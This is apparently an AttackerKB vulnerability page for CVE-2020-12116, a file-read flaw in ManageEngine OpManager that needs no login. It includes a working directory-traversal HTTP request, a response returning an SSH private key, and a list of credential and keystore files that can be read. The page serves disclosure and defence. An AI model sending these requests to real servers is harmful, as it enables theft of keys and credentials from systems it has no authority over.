Unknown
CVE-2020-12116
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2020-12116
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
Add Assessment
Ratings
Technical Analysis
Unauthenticated arbitrary file read on ManageEngine OpMange
DESCRIPTION
The latest release of OpManger contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from “conf/OpManager/ldap.conf”.
PROOF OF CONCEPT
REQUEST:
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: <HOSTNAME>:8060 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: close Cache-Control: max-age=0 Referer: http://<HOSTNAME>:8060/
RESPONSE:
HTTP/1.1 200 Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly X-FRAME-OPTIONS: DENY Accept-Ranges: bytes ETag: W/"902-1586033949624" Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT Vary: Accept-Encoding Date: Mon, 13 Apr 2020 15:40:01 GMT Connection: close Content-Length: 902 -----BEGIN RSA PRIVATE KEY----- MIICX...pXqnO -----END RSA PRIVATE KEY-----
Here are the files you can read
"bin/.ssh_host_dsa_key", "bin/.ssh_host_dsa_key.pub", "bin/.ssh_host_rsa_key", "bin/.ssh_host_rsa_key.pub", "conf/client.keystore", "conf/customer-config.xml", "conf/database_params.conf", "conf/FirewallAnalyzer/aaa_auth-conf.xml", "conf/FirewallAnalyzer/auth-conf_ppm.xml", "conf/gateway.conf", "conf/itom.truststore", "conf/netflow/auth-conf.xml", "conf/netflow/server.xml", "conf/netflow/ssl_server.xml", "conf/NFAEE/cs_server.xml", "conf/OpManager/database_params.conf", "conf/OpManager/database_params_DE.conf", "conf/OpManager/ldap.conf", "conf/OpManager/MicrosoftSQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params_DE.conf", "conf/OpManager/securitydbData.xml", "conf/OpManager/SnmpDefaultProperties.xml", "conf/Oputils/snmp/Community.xml", "conf/Persistence/DBconfig.xml", "conf/Persistence/persistence-configurations.xml", "conf/pmp/PMP_API.conf", "conf/pmp/pmp_server_cert.p12", "conf/product-config.xml", "conf/SANSeed.xml", "conf/server.keystore", "conf/server.xml", "conf/system_properties.conf", "conf/tomcat-users.xml", "lib/OPM_APNS_Cert.p12"
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- zohocorp
Products
- manageengine opmanager,
- manageengine opmanager 12.4,
- manageengine opmanager 12.5
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Hey there, friend, just wanted to say thanks for all the great technical assessments recently. The team’s started looking forward to your evaluations. Much appreciated!